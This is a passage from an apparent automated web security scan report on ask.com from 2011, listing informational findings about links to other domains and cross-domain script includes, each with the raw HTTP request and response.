Your Question?</title><meta name="description" content="Ask.com is the #1 question answering service that de...[SNIP]... </span><a class="facebook sprite" href="http://www.facebook.com/AskDotCom"> </a><a class="twitter sprite" href="http://twitter.com/askdotcom"> </a>...[SNIP]... </span><a id="ftCareers" href="http://hire.jobvite.com/CompanyJobs/Careers.aspx?c=qXY9VfwJ&su=fsY9Vfwe&cs=93q9Vfwh" class="txt3" > Careers</a>...[SNIP]... </span><a id="ftHelp" href="http://asksupport.custhelp.com/app/answers/list" class="txt3" target="_blank"> Help</a>...[SNIP]... </script><script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"> </script>...[SNIP]... <noscript><img src="http://b.scorecardresearch.com/p?c1=2&c2=6034776&c3=&c4=&c5=&c6=&c15=&cj=1" /> </noscript>...[SNIP]... <noscript><iframe src="http://fls.doubleclick.net/activityi;src=2903398;type=homep773;cat=ask_e764;u1=0845DB8DB66BB2CFE0A8DECE14D761F3;u4=;u3=;u2=0;ord=-138491069?" width="1" height="1" frameborder="0"> </iframe>...[SNIP]...
7.4. http://www.ask.com/
Summary
Severity: Information
Confidence: Certain
Host: http://www.ask.com
Path: /
Issue detail
The page was loaded from a URL containing a query string: http://www.ask.com/?o=0&l=dir
The response contains the following links to other domains:
http://api.recaptcha.net/js/recaptcha_ajax.js
http://asksupport.custhelp.com/app/answers/list
http://b.scorecardresearch.com/p?c1=2&c2=6034776&c3=&c4=&c5=&c6=&c15=&cj=1
http://fls.doubleclick.net/activityi;src=2903398;type=homep773;cat=ask_e764;u1=0845DB8DB66BB2CFE0A8DECE14D761F3;u4=;u3=;u2=0;ord=-385647690?
http://hire.jobvite.com/CompanyJobs/Careers.aspx?c=qXY9VfwJ&su=fsY9Vfwe&cs=93q9Vfwh
http://twitter.com/askdotcom
http://www.facebook.com/AskDotCom
Request
GET /?o=0&l=dir HTTP/1.1 Host: www.ask.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cu.wz=0; wz_cu=0; tbe=1; accepting=1; user=o=0&l=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0; ldpt=porg=5829|0~5830|0~5832|0~5833|0~5834|0~5488|0~5489|1; puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA1OjI5LVVUQw%3D%3D&po=0&pp=dir; wz_uid=0845DB8DB66BB2CFE0A8DECE14D761F3; wz_sid=0144DB8DB86BB2CFE0A8DECE14D761F3; wz_scnt=1; __utmz=252994457.1300982764.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252994457.137424121.1300982764.1300982764.1300982764.1; __utmc=252994457; __utmb=252994457.1.10.1300982764
Response
HTTP/1.1 200 OK Server: Apache Cache-Control: private Content-Type: text/html;charset=UTF-8 Date: Thu, 24 Mar 2011 16:05:38 GMT Connection: close Vary: Accept-Encoding Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA1OjM4LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:05:38 GMT; Path=/ Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:05:38 GMT; Path=/ Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: qc=0; Domain=.ask.com; Path=/ Content-Length: 94491 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"><html><head><title>Ask.com - What's Your Question?</title><meta name="description" content="Ask.com is the #1 question answering service that de...[SNIP]... </span><a class="facebook sprite" href="http://www.facebook.com/AskDotCom"> </a><a class="twitter sprite" href="http://twitter.com/askdotcom"> </a>...[SNIP]... </span><a id="ftCareers" href="http://hire.jobvite.com/CompanyJobs/Careers.aspx?c=qXY9VfwJ&su=fsY9Vfwe&cs=93q9Vfwh" class="txt3" > Careers</a>...[SNIP]... </span><a id="ftHelp" href="http://asksupport.custhelp.com/app/answers/list" class="txt3" target="_blank"> Help</a>...[SNIP]... </script><script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"> </script>...[SNIP]... <noscript><img src="http://b.scorecardresearch.com/p?c1=2&c2=6034776&c3=&c4=&c5=&c6=&c15=&cj=1" /> </noscript>...[SNIP]... <noscript><iframe src="http://fls.doubleclick.net/activityi;src=2903398;type=homep773;cat=ask_e764;u1=0845DB8DB66BB2CFE0A8DECE14D761F3;u4=;u3=;u2=0;ord=-385647690?" width="1" height="1" frameborder="0"> </iframe>...[SNIP]...
7.5. http://www.ask.com/answers/7153311/is-nail-polish-bad-for-your-nails
Summary
Severity: Information
Confidence: Certain
Host: http://www.ask.com
Path: /answers/7153311/is-nail-polish-bad-for-your-nails
Issue detail
The page was loaded from a URL containing a query string: http://www.ask.com/answers/7153311/is-nail-polish-bad-for-your-nails?qsrc=4034
The response contains the following links to other domains:
http://api.recaptcha.net/js/recaptcha_ajax.js
http://ask.pronto.com/user/search.do?&q=
http://asksupport.custhelp.com/app/answers/list
http://b.scorecardresearch.com/p?c1=2&c2=6034776&c3=&c4=&c5=&c6=&c15=&cj=1
http://hire.jobvite.com/CompanyJobs/Careers.aspx?c=qXY9VfwJ&su=fsY9Vfwe&cs=93q9Vfwh
http://www.askkids.com/?o=0&l=dir
Request
GET /answers/7153311/is-nail-polish-bad-for-your-nails?qsrc=4034 HTTP/1.1 Host: www.ask.com Proxy-Connection: keep-alive Referer: http://www.ask.com/?o=0&l=dir User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cu.wz=0; wz_cu=0; tbe=1; accepting=1; user=o=0&l=dir; ldpt=porg=5829|0~5830|0~5832|0~5833|0~5834|0~5488|0~5489|1; wz_uid=0845DB8DB66BB2CFE0A8DECE14D761F3; wz_scnt=1; __utmz=252994457.1300982764.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252994457.137424121.1300982764.1300982764.1300982764.1; __utmc=252994457; __utmb=252994457.3.10.1300982764; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0; puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA3OjUxLVVUQw%3D%3D&po=0&pp=dir; wz_sid=0144DB8DB86BB2CFE0A8DECE14D761F3
Response
HTTP/1.1 200 OK Server: Apache Cache-Control: no-cache Content-Type: text/html;charset=UTF-8 Date: Thu, 24 Mar 2011 16:09:53 GMT Connection: close Vary: Accept-Encoding Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA5OjUyLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:09:52 GMT; Path=/ Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:09:52 GMT; Path=/ Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: qc=0; Domain=.ask.com; Path=/ Content-Length: 118233 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"> <html> <head> ...[SNIP]... <li><a href="http://ask.pronto.com/user/search.do?&q=" class="txt3 b" style=""> Shopping</a>...[SNIP]... <li> <a href="http://www.askkids.com?o=0&l=dir" class="txt3 b" style=""> Kids</a>...[SNIP]... </a>, or, <a class="txt3 title b" href="http://asksupport.custhelp.com/app/answers/list" target="_blank"> report a problem</a>...[SNIP]... <a href="http://hire.jobvite.com/CompanyJobs/Careers.aspx?c=qXY9VfwJ&su=fsY9Vfwe&cs=93q9Vfwh" onmousedown="return ct(this,5015)" class="txt2 info l_nu" target="_top"> Careers</a>...[SNIP]... <a href="http://asksupport.custhelp.com/app/answers/list" onmousedown="return ct(this,54387)" class="txt2 info l_nu" target="_blank"> Help</a>...[SNIP]... <noscript> <img src="http://b.scorecardresearch.com/p?c1=2&c2=6034776&c3=&c4=&c5=&c6=&c15=&cj=1" /> </noscript>...[SNIP]... </script> <script src="http://api.recaptcha.net/js/recaptcha_ajax.js" type="text/javascript"> </script>...[SNIP]...
7.6. http://www.ask.com/ja-ask-dialog
Summary
Severity: Information
Confidence: Certain
Host: http://www.ask.com
Path: /ja-ask-dialog
Issue detail
The page was loaded from a URL containing a query string: http://www.ask.com/ja-ask-dialog?type=signin
The response contains the following link to another domain:
http://asksupport.custhelp.com/app/answers/list
Request
GET /ja-ask-dialog?type=signin HTTP/1.1 Host: www.ask.com Proxy-Connection: keep-alive Referer: http://www.ask.com/?o=0&l=dir X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: text/html, */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cu.wz=0; wz_cu=0; tbe=1; accepting=1; user=o=0&l=dir; puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA1OjI4LVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0; ldpt=porg=5829|0~5830|0~5832|0~5833|0~5834|0~5488|0~5489|1
Response
HTTP/1.1 200 OK Server: Apache Cache-Control: no-cache Content-Type: text/html;charset=UTF-8 Date: Thu, 24 Mar 2011 16:05:29 GMT Connection: close Vary: Accept-Encoding Set-Cookie: puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA1OjI5LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:05:29 GMT; Path=/ Content-Length: 68842 ...[SNIP]... <div class="txt3" style="margin-top:10px;clear:both">If you continue to have trouble accessing your account, please<a href="http://asksupport.custhelp.com/app/answers/list" target="_blank" style="margin-left:5px"> contact us</a>...[SNIP]...
7.7. http://www.ask.com/pictures
Summary
Severity: Information
Confidence: Certain
Host: http://www.ask.com
Path: /pictures
Issue detail
The page was loaded from a URL containing a query string:http://www.ask.com/pictures?q=Star+Jones&o=0&l=dir&qsrc=3015 The response contains the following links to other domains:http://api.recaptcha.net/js/recaptcha_ajax.js http://ask.pronto.com/user/search.do?&q=Star+Jones http://asksupport.custhelp.com/app/answers/list http://b.scorecardresearch.com/p?c1=2&c2=6034776&c3=&c4=&c5=&c6=&c15=&cj=1 http://hire.jobvite.com/CompanyJobs/Careers.aspx?c=qXY9VfwJ&su=fsY9Vfwe&cs=93q9Vfwh http://media1.picsearch.com/is?GD5gPj98B-swbe4ltiC8EH4_ZnXHnYcjvCWirsaFR3g http://media1.picsearch.com/is?MQXy3aeGK1vPsSBpsvVJku72LVFMiH-OtfPmmPzM-t0 http://media1.picsearch.com/is?uYkq8UoKbbEyqSFVvPxFwdnof3zBMnfztquGSliwJBY http://media2.picsearch.com/is?HgmpqpRUhfsqvTJLx5Ot85nNjg_n_u49IGVg-V_IHwE http://media2.picsearch.com/is?UxEYfkAWyo7kAQxGQc1HjkK5d0nBSYsvaXseGYeYrmg http://media2.picsearch.com/is?YxpaNH9HSDoSw9H5oJweQvzdEzzaQHvms6xJJlarJdA http://media2.picsearch.com/is?pCyoxpNWi32Pexkf0cXJPV3U5txt3AUJkrxGQrRemNY http://media3.picsearch.com/is?4EhQpufXvSdi_X3-krZCwFTLTY26zUxrG8ToZzKzihI http://media3.picsearch.com/is?GTs0MY3TLN6nxwYoFo0VntJdpD-JpfHKiKI5WmPIhR8 http://media3.picsearch.com/is?ReB8hiNNxGYg2MKsjs8TM8t5wAdAU2GzTAyVZ2cU5fs http://media3.picsearch.com/is?gtAamX0iO5iJN-n4VSRkM6_DvzX_0DYUCPtcWJ5xXKE http://media3.picsearch.com/is?jgAPFGTZ0c8ev6jKdZUKKjapInd6akDQkdoQE0hrZWc http://media4.picsearch.com/is?h_G9gKfxqLXZKYM9u7o8YM1fjG465xYQ0XdbYxvkews http://media4.picsearch.com/is?xtrbPaZy-PB1G22mZbkgxKZSq997yCl0mqOubVuWpE0 http://media5.picsearch.com/is?5t6T1C3x4FGyKv5IBxE3NHdrDznnHj1Z49qnDTU-wmU http://media5.picsearch.com/is?I6Go4BTbpWN2CJV8LnF3FmG0sldz_LKdOQ_ItPdOozQ http://media5.picsearch.com/is?OyC2e6btfy1WLSfgSiuPbAAra4fOXQh40MerfMYTTxc http://media5.picsearch.com/is?oY5f4cPIHsRAHw9BaO3LxuzAbf1cpPSG82Vles2qOVo http://www.askkids.com/?o=0&l=dir
Request
GET /pictures?q=Star+Jones&o=0&l=dir&qsrc=3015 HTTP/1.1 Host: www.ask.com Proxy-Connection: keep-alive Referer: http://www.ask.com/pictureslanding?o=0&l=dir User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cu.wz=0; wz_cu=0; tbe=1; accepting=1; user=o=0&l=dir; ldpt=porg=5829|0~5830|0~5832|0~5833|0~5834|0~5488|0~5489|1; wz_uid=0845DB8DB66BB2CFE0A8DECE14D761F3; wz_scnt=1; __utmz=252994457.1300982764.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0; puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA3OjA3LVVUQw%3D%3D&po=0&pp=dir; wz_sid=0144DB8DB86BB2CFE0A8DECE14D761F3; __utma=252994457.137424121.1300982764.1300982764.1300982764.1; __utmc=252994457; __utmb=252994457.3.10.1300982764
Response
HTTP/1.1 200 OK Server: Apache Cache-Control: private Content-Type: text/html;charset=UTF-8 Date: Thu, 24 Mar 2011 16:07:50 GMT Connection: close Vary: Accept-Encoding Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA3OjUwLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:07:50 GMT; Path=/ Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:07:50 GMT; Path=/ Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: qc=0; Domain=.ask.com; Path=/ Content-Length: 106391 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"> <html> <head> ...[SNIP]... <li><a href="http://ask.pronto.com/user/search.do?&q=Star+Jones" class="txt3 b" style=""> Shopping</a>...[SNIP]... <li> <a href="http://www.askkids.com?o=0&l=dir" class="txt3 b" style=""> Kids</a>...[SNIP]... <div id="di0"><img id="image0" src="http://media3.picsearch.com/is?GTs0MY3TLN6nxwYoFo0VntJdpD-JpfHKiKI5WmPIhR8" border="0" hspace="0" vspace="0" width="128" /> </div>...[SNIP]... <div id="di1"><img id="image1" src="http://media2.picsearch.com/is?UxEYfkAWyo7kAQxGQc1HjkK5d0nBSYsvaXseGYeYrmg" border="0" hspace="0" vspace="0" height="128" /> </div>...[SNIP]... <div id="di2"><img id="image2" src="http://media5.picsearch.com/is?5t6T1C3x4FGyKv5IBxE3NHdrDznnHj1Z49qnDTU-wmU" border="0" hspace="0" vspace="0" height="128" /> </div>...[SNIP]... <div id="di3"><img id="image3" src="http://media3.picsearch.com/is?4EhQpufXvSdi_X3-krZCwFTLTY26zUxrG8ToZzKzihI" border="0" hspace="0" vspace="0" height="128" /> </div>...[SNIP]... <div id="di4"><img id="image4" src="http://media2.picsearch.com/is?YxpaNH9HSDoSw9H5oJweQvzdEzzaQHvms6xJJlarJdA" border="0" hspace="0" vspace="0" height="128" /> </div>...[SNIP]... 
<div id="di5"><img id="image5" src="http://media1.picsearch.com/is?uYkq8UoKbbEyqSFVvPxFwdnof3zBMnfztquGSliwJBY" border="0" hspace="0" vspace="0" width="128" /> </div>...[SNIP]... <div id="di6"><img id="image6" src="http://media2.picsearch.com/is?HgmpqpRUhfsqvTJLx5Ot85nNjg_n_u49IGVg-V_IHwE" border="0" hspace="0" vspace="0" width="128" /> </div>...[SNIP]... <div id="di7"><img id="image7" src="http://media3.picsearch.com/is?gtAamX0iO5iJN-n4VSRkM6_DvzX_0DYUCPtcWJ5xXKE" border="0" hspace="0" vspace="0" height="128" /> </div>...[SNIP]... <div id="di8"><img id="image8" src="http://media5.picsearch.com/is?oY5f4cPIHsRAHw9BaO3LxuzAbf1cpPSG82Vles2qOVo" border="0" hspace="0" vspace="0" width="128" /> </div>...[SNIP]... <div id="di9"><img id="image9" src="http://media3.picsearch.com/is?ReB8hiNNxGYg2MKsjs8TM8t5wAdAU2GzTAyVZ2cU5fs" border="0" hspace="0" vspace="0" width="128" /> </div>...[SNIP]... <div id="di10"><img id="image10" src="http://media2.picsearch.com/is?pCyoxpNWi32Pexkf0cXJPV3U5txt3AUJkrxGQrRemNY" border="0" hspace="0" vspace="0" height="128" /> </div>...[SNIP]... <div id="di11"><img id="image11" src="http://media4.picsearch.com/is?xtrbPaZy-PB1G22mZbkgxKZSq997yCl0mqOubVuWpE0" border="0" hspace="0" vspace="0" height="128" /> </div>...[SNIP]... <div id="di12"><img id="image12" src="http://media3.picsearch.com/is?jgAPFGTZ0c8ev6jKdZUKKjapInd6akDQkdoQE0hrZWc" border="0" hspace="0" vspace="0" height="128" /> </div>...[SNIP]... <div id="di13"><img id="image13" src="http://media5.picsearch.com/is?OyC2e6btfy1WLSfgSiuPbAAra4fOXQh40MerfMYTTxc" border="0" hspace="0" vspace="0" width="128" /> </div>...[SNIP]... <div id="di14"><img id="image14" src="http://media1.picsearch.com/is?GD5gPj98B-swbe4ltiC8EH4_ZnXHnYcjvCWirsaFR3g" border="0" hspace="0" vspace="0" width="128" /> </div>...[SNIP]... <div id="di15"><img id="image15" src="http://media1.picsearch.com/is?MQXy3aeGK1vPsSBpsvVJku72LVFMiH-OtfPmmPzM-t0" border="0" hspace="0" vspace="0" height="128" /> </div>...[SNIP]... 
<div id="di16"><img id="image16" src="http://media4.picsearch.com/is?h_G9gKfxqLXZKYM9u7o8YM1fjG465xYQ0XdbYxvkews" border="0" hspace="0" vspace="0" height="128" /> </div>...[SNIP]... <div id="di17"><img id="image17" src="http://media5.picsearch.com/is?I6Go4BTbpWN2CJV8LnF3FmG0sldz_LKdOQ_ItPdOozQ" border="0" hspace="0" vspace="0" height="128" /> </div>...[SNIP]... <a href="http://hire.jobvite.com/CompanyJobs/Careers.aspx?c=qXY9VfwJ&su=fsY9Vfwe&cs=93q9Vfwh" onmousedown="return ct(this,5015)" class="txt2 info l_nu" target="_top"> Careers</a>...[SNIP]... <a href="http://asksupport.custhelp.com/app/answers/list" onmousedown="return ct(this,54387)" class="txt2 info l_nu" target="_blank"> Help</a>...[SNIP]... <noscript> <img src="http://b.scorecardresearch.com/p?c1=2&c2=6034776&c3=&c4=&c5=&c6=&c15=&cj=1" /> </noscript>...[SNIP]... </script> <script src="http://api.recaptcha.net/js/recaptcha_ajax.js" type="text/javascript"> </script>...[SNIP]...
7.8. http://www.ask.com/pictureslanding
Summary
Severity: Information
Confidence: Certain
Host: http://www.ask.com
Path: /pictureslanding
Issue detail
The page was loaded from a URL containing a query string:http://www.ask.com/pictureslanding?o=0&l=dir The response contains the following links to other domains:http://66.235.120.67/e?t=134778139101773407 http://66.235.120.67/e?t=13926407979329723328 http://66.235.120.67/e?t=17074163800304751245 http://66.235.120.67/e?t=4934756863126158196 http://66.235.120.67/e?t=7053435246216489458 http://66.235.120.67/e?t=8811184322805729450 http://api.recaptcha.net/js/recaptcha_ajax.js http://ask.pronto.com/user/search.do?&q= http://asksupport.custhelp.com/app/answers/list http://b.scorecardresearch.com/p?c1=2&c2=6034776&c3=&c4=&c5=&c6=&c15=&cj=1 http://hire.jobvite.com/CompanyJobs/Careers.aspx?c=qXY9VfwJ&su=fsY9Vfwe&cs=93q9Vfwh http://pagead2.googlesyndication.com/pagead/show_ads.js http://www.askkids.com/?o=0&l=dir
Request
GET /pictureslanding?o=0&l=dir HTTP/1.1 Host: www.ask.com Proxy-Connection: keep-alive Referer: http://www.ask.com/?o=0&l=dir User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cu.wz=0; wz_cu=0; tbe=1; accepting=1; user=o=0&l=dir; ldpt=porg=5829|0~5830|0~5832|0~5833|0~5834|0~5488|0~5489|1; wz_uid=0845DB8DB66BB2CFE0A8DECE14D761F3; wz_scnt=1; __utmz=252994457.1300982764.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wz_sid=0144DB8DB86BB2CFE0A8DECE14D761F3; __utma=252994457.137424121.1300982764.1300982764.1300982764.1; __utmc=252994457; __utmb=252994457.2.10.1300982764; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0; puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA3OjAwLVVUQw%3D%3D&po=0&pp=dir
Response
HTTP/1.1 200 OK Server: Apache Content-Type: text/html;charset=UTF-8 Cache-Control: private Date: Thu, 24 Mar 2011 16:07:02 GMT Connection: close Vary: Accept-Encoding Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA3OjAyLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:07:02 GMT; Path=/ Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:07:02 GMT; Path=/ Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: qc=0; Domain=.ask.com; Path=/ Content-Length: 59137 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"> <html> <head> <tit...[SNIP]... <li><a href="http://ask.pronto.com/user/search.do?&q=" class="txt3 b" style=""> Shopping</a>...[SNIP]... <li> <a href="http://www.askkids.com?o=0&l=dir" class="txt3 b" style=""> Kids</a>...[SNIP]... <div id="di0"><img id="image0" src="http://66.235.120.67:80/e?t=4934756863126158196" border="0" hspace="0" vspace="0" width="128" height="128"/> </div>...[SNIP]... <div id="di1"><img id="image1" src="http://66.235.120.67:80/e?t=8811184322805729450" border="0" hspace="0" vspace="0" width="128" height="128"/> </div>...[SNIP]... <div id="di2"><img id="image2" src="http://66.235.120.67:80/e?t=17074163800304751245" border="0" hspace="0" vspace="0" width="128" height="128"/> </div>...[SNIP]... <div id="di3"><img id="image3" src="http://66.235.120.67:80/e?t=13926407979329723328" border="0" hspace="0" vspace="0" width="128" height="128"/> </div>...[SNIP]... <div id="di4"><img id="image4" src="http://66.235.120.67:80/e?t=134778139101773407" border="0" hspace="0" vspace="0" width="128" height="128"/> </div>...[SNIP]... 
<div id="di5"><img id="image5" src="http://66.235.120.67:80/e?t=7053435246216489458" border="0" hspace="0" vspace="0" width="128" height="128"/> </div>...[SNIP]... </script><script language="javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>...[SNIP]... <a href="http://hire.jobvite.com/CompanyJobs/Careers.aspx?c=qXY9VfwJ&su=fsY9Vfwe&cs=93q9Vfwh" onmousedown="return ct(this,5015)" class="txt2 info l_nu" target="_top"> Careers</a>...[SNIP]... <a href="http://asksupport.custhelp.com/app/answers/list" onmousedown="return ct(this,54387)" class="txt2 info l_nu" target="_blank"> Help</a>...[SNIP]... <noscript> <img src="http://b.scorecardresearch.com/p?c1=2&c2=6034776&c3=&c4=&c5=&c6=&c15=&cj=1" /> </noscript>...[SNIP]... </script> <script src="http://api.recaptcha.net/js/recaptcha_ajax.js" type="text/javascript"> </script>...[SNIP]...
8. Cross-domain script include
There are 4 instances of this issue:
8.1. http://www.ask.com/
Summary
Severity: Information
Confidence: Certain
Host: http://www.ask.com
Path: /
Issue detail
The response dynamically includes the following script from another domain: http://api.recaptcha.net/js/recaptcha_ajax.js
Request
GET /?o=0&l=dir HTTP/1.1 Host: www.ask.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cu.wz=0; wz_cu=0; tbe=1; accepting=1; puser=pt=VHVlLTIyLU1hci0yMDExLTE2OjAzOjU4LVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0
Response
HTTP/1.1 200 OK Server: Apache Cache-Control: private Content-Type: text/html;charset=UTF-8 Date: Thu, 24 Mar 2011 16:05:28 GMT Connection: close Vary: Accept-Encoding Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: user=o=0&l=dir; Domain=.ask.com; Path=/ Set-Cookie: puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA1OjI4LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:05:28 GMT; Path=/ Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:05:28 GMT; Path=/ Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: qc=0; Domain=.ask.com; Path=/ Set-Cookie: ldpt=porg=5829|0~5830|0~5832|0~5833|0~5834|0~5488|0~5489|1; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:05:28 GMT; Path=/ Content-Length: 94462 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"><html><head><title>Ask.com - What's Your Question?</title><meta name="description" content="Ask.com is the #1 question answering service that de...[SNIP]... </script><script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"> </script>...[SNIP]...
8.2. http://www.ask.com/answers/7153311/is-nail-polish-bad-for-your-nails
Summary
Severity: Information
Confidence: Certain
Host: http://www.ask.com
Path: /answers/7153311/is-nail-polish-bad-for-your-nails
